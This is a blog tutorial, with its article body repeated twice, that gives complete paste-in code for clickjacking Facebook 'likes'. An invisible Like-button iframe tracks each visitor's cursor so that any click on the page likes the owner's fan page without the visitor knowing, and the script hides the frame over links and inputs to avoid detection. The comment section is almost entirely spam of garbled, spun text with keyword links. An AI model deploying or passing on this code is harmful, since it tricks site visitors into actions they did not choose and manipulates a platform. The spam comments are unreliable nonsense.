Automatically Increase Facebook Fans in Fan-page with Webpage Script

Friday, September 14, 2012 | comments (37)



Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }
 
</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :)

Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }
 
</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :) 

Share this article :

+ comments + 37 comments

September 15, 2012 at 12:21 AM



It is really a nice and helpful piece of info. I’m glad that you simply shared this helpful info with us. Please keep us
informed like this. Thank you for sharing.
web designing companies

fUnRaNa.coM
September 15, 2012 at 11:35 PM

Nice Info..

Anonymous
March 19, 2013 at 2:00 PM

The irritation could then spread in the baby's buttocks and upper thigh area, as well as the genitals. Include about three to 4 tablespoons of vinegar to a bathtub stuffed with a tiny sum of warm h2o and only bathe in it for fifteen to twenty minutes. If you apply Aloe Vera gel on the affected areas it can help reduce the itching and burning caused by the infection.

Here is my web-site ... vaginal yeast infection and antibiotics
my site: yeast infection and symptoms of

Anonymous
March 19, 2013 at 8:51 PM

Later on, among the continued practice ending up
will continue to be auxiliary accustomed burning the various chords.
Www. Best Regards.

my blog - printable piano chords and scales
My web page :: piano chords and notes of only hope

Anonymous
March 19, 2013 at 11:46 PM

Fashion Games of Teen Girls Interested Are Fun These challenges are at times shared amongst buddies.

The game was released on August 3, and is in stores now, but probably is where it will remain,
sad to say. Now, one of my co-workers was applying to the
Secret Service and I knew that I was down as a reference for her.


my web-site - analytics

Anonymous
March 20, 2013 at 1:00 AM

D Minor:. Do not overlook this part of your learning. Pretend that we are palming
an egg and keep your arms relaxed and fingers curled.


Check out my web page - piano chords amazing grace my chains are gone

Anonymous
March 20, 2013 at 1:10 AM

The owner decided after the event to donate half of the proceeds
back to the students. This was zero cost because the students
went to local stores and asked for either donations and gift cards
to purchase these items. The game would begin with
them watching the collapse of society and the outbreak of magic around the world.


Also visit my site buy pc games online

Anonymous
March 22, 2013 at 11:46 PM

The only hurdle to accessing this is of course human limitations and the fact that the brain does not function solely as
a learning tool for the human being. Local country clubs are offering trivia fun for as little as forty dollars per couple.
They feature almost nightly drink specials and
some form of entertainment every night of the week--DJ's, live music, trivia, you name it.

My web page: clever pub quiz names

Anonymous
April 6, 2013 at 1:08 AM

In a nutshell, the Diеt Coκe And Mentos is hіgh in essential
fatty acids. If paѕta, bread аnd rice during periоds of еxtended recoνeгy bеtween worκouts.


Feel fгee to visit my blog post; paleo cake

Anonymous
April 14, 2013 at 4:22 PM

So you are looking to rid your girl of these unwanted stalkers when you are drawn to Willow Creek's Black Mirror Castle. At the end of the party all of the papers write down who they think was the prohibition agent. Play games all night long in keeping with the twenties theme such as various card games and crossword puzzles.

Here is my web page :: albuquerque hotels

Anonymous
April 15, 2013 at 4:45 PM

I blog quite often and I really thank you for your information.
Your article has really peaked my interest. I'm going to bookmark your website and keep checking for new information about once per week. I opted in for your RSS feed as well.

My homepage :: workouts to improve vertical

Anonymous
April 16, 2013 at 1:21 AM

I eat sushi, I eat a large, rimmed baking sheet, such as
lentils, split peas, black beans or hummus instead of potatoes, pasta or potatoes.

For more on weight loss, the research showed that meals composed of foods of a similar shape, taste and
colour may curb overeating. However, they conclude:" These late pulmonary complications can present with asthma-like symptoms and can be found online and also in Africa volume of ejaculate and age and Australia. If this sounds too good to be true.

Look at my weblog male enhancement

Anonymous
April 20, 2013 at 4:54 AM

Upon returning to the starting line, the first player must pass the
sugar cube to the next teammate in line and so on.
At the end of the party all of the papers write down who they think was the prohibition agent.
Cranberry studios developed this sequel while
publisher Anaconda brings it to you in stores.


Also visit my page :: term life insurance

Anonymous
April 20, 2013 at 9:34 PM

By dividing up the party at several peoples houses
you make it easy on yourself. This was zero cost because the students went to local stores
and asked for either donations and gift cards
to purchase these items. Spice things up by including these Halloween-themes recipes:
.

Also visit my homepage: dublin hotels

Anonymous
April 23, 2013 at 5:18 PM

In that case, this kind of question should not be taken from any show
telecasted in specific country. Anna had been looking through my phone while I was naked.

The Bull's Head Pub, Bangkok.

My site; clever pub quiz names

Anonymous
April 27, 2013 at 8:24 AM

In this article I will teach you the basics of how to have fun learning your chords by playing out of a Fake
Book. So you want to learn how to play the piano. These hail every little thing played
getting rid of barely the sophisticated keys, so you ought to keep effective toward crush extra listed below barely a limited area of time.


my web page; piano chords amazing grace my chains are gone

Anonymous
April 27, 2013 at 12:51 PM

Fashion Games of Teen Girls Interested Are Fun These challenges are
at times shared amongst buddies. You make different
challenges like scavenger hunts, food challenges, mazes and races.
The game would begin with them watching the collapse of society and the
outbreak of magic around the world.

my blog :: college Humor

Anonymous
April 29, 2013 at 6:23 PM

So you are looking to rid your girl of these unwanted stalkers when you
are drawn to Willow Creek's Black Mirror Castle. This was zero cost because the students went to local stores and asked for either donations and gift cards to purchase these items. Every Halloween party that people remember later in the year by saying things like "Do you remember so-and-so's Halloween party last year.



Also visit my web page justin timberlake

Anonymous
May 6, 2013 at 12:49 AM

The owner decided after the event to donate half of the proceeds back to the students.
You make different challenges like scavenger hunts, food challenges, mazes
and races. I hope you have fun planing a birthday party for your tween, I hope my
birthday party ideas for tween's helped you.

Also visit my page - portland hotels

Anonymous
May 6, 2013 at 9:43 AM

They're made from a type of leather that has a natural resistance to water. Naturally it is now on his medical records that he is highly allergic to Ibuprofen and has strict orders to never take it again. If you love racing, you'll want to check
out Der Bahn in Schlitterbahn West.

my web blog ... water shoes

Anonymous
May 8, 2013 at 1:22 AM

I loved as much as you will receive carried out right here.
The sketch is tasteful, your authored subject matter stylish.

nonetheless, you command get got an impatience over
that you wish be delivering the following.
unwell unquestionably come further formerly again as exactly
the same nearly a lot often inside case you shield this increase.


my web site :: Http://Www.Rejestic.com/

Anonymous
May 10, 2013 at 8:09 PM

DJ spins out on Saturday nights. Anna had been looking
through my phone while I was naked. The Bull's Head Pub, Bangkok.

Also visit my web page; pub quiz team names

Anonymous
May 11, 2013 at 7:19 AM

So you are looking to rid your girl of these unwanted stalkers when you
are drawn to Willow Creek's Black Mirror Castle. Unfortunately for me as an addict, I need my crime fix. I hope you have fun planing a birthday party for your tween, I hope my birthday party ideas for tween's helped you.



Feel free to visit my webpage ... virgin mobile

Anonymous
May 11, 2013 at 9:51 AM

One thing that you should practice, and the only time that I believe you will dump your kayak will be when exiting and re-entering the boat.
Some fishermen just take a rod and a few lures along and others like to bring lots of gear along.

Kayaks can also be classified as ocean kayaks, Hobie kayaks, river kayaks, and tandem kayaks.


my web-site :: business firewall software

Anonymous
May 12, 2013 at 5:49 AM

In that case, this kind of question should not be taken from any show
telecasted in specific country. Below are listed a few popular pubs where one can
chill in Mumbai. Her father, Bruce Paltrow, produced the critically acclaimed TV series that is considered the precursor to
many medical shows today, St.

Also visit my web page :: easy pub quiz and answers

Anonymous
May 14, 2013 at 1:16 AM

Also, we need to determine the rounds of the quiz according
to it. Popular prizes include sports tickets, cash and vouchers for drinks, food -
and dollars off of tabs. 8.

My weblog; pub quiz austin

Anonymous
May 15, 2013 at 12:05 PM

They're made from a type of leather that has a natural resistance to water. It is a must see and experience if you are in the area. It is VERY important that adults bring actual swimwear to wear in the water park.

Here is my webpage ... water shoes

Anonymous
May 17, 2013 at 3:26 AM

What You Can Gain. Obesity is an epidemic in our society.
Other diets target only eating a particular food group or perhaps raw foods only.


Here is my homepage ... paleo diet and ms

Anonymous
May 24, 2013 at 8:49 PM

DJ spins out on Saturday nights. * Team answer sheets - Basically a grid lined A4 type sheet with answer write in numbered boxes and a line
on top for the team name. The food is decent and the drink specials on Tuesdays include $2.


Here is my website ... pub quiz aberdeen

Anonymous
May 27, 2013 at 7:35 PM

Overview Remember when download call of duty for pc used to be about actually playing the game, it was pure fear.
Pc release date in queue for 2012 on multiple formats.
Dishonored Xbox 360 / PS3 download call of duty for pc From 15.
This is common for those kids to skip class and the hole deepens.


Here is my website: call of duty halloween costumes

Anonymous
May 28, 2013 at 6:01 AM

On Sunday nights Erin Jaimes hosts a blues jam
where anyone from Alan Haynes to Gary Clark, Jr. Local country clubs are offering trivia fun for as little as forty dollars per couple.
Theme Format: It is almost like standard format of the pub quiz.


My weblog :: great pub quiz names

Anonymous
May 29, 2013 at 12:25 PM

In education news, a recently conducted study showed
that 83% of children who play Mature-rated nintendo kinect.

Yes the game and watch TV shows or movies Have you experienced playing annoying nintendo kinect that take out your time because its really hard to overcome this symptoms.

A short story may tell the story of a single person.


My site; buy dance central

Anonymous
May 31, 2013 at 12:35 AM

On Sunday nights Erin Jaimes hosts a blues jam where anyone
from Alan Haynes to Gary Clark, Jr. Popular prizes include sports tickets,
cash and vouchers for drinks, food - and dollars off of tabs.
Ask your local club to run this for you.

my site - pub quiz archive

Anonymous
June 6, 2013 at 3:54 PM

On Sunday nights Erin Jaimes hosts a blues jam where anyone from Alan Haynes to Gary Clark, Jr.
*Rounds table format. Theme Format: It is almost like standard format of the pub quiz.


my blog post ... pub quiz and answers general knowledge

Anonymous
June 7, 2013 at 6:22 AM

In that case, this kind of question should not be taken from any show telecasted in specific country.
At the end of each round read out the cumulative scores. The buccal
cavity is a small cavity that has neither jaws
nor teeth.

Feel free to surf to my web site: pub quiz archives

Post a Comment

 
Support : Sanjaya Einy | Blogger Tricks Templatee
Copyright © 2011. Tips and Tricks NET - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Premium Blogger Template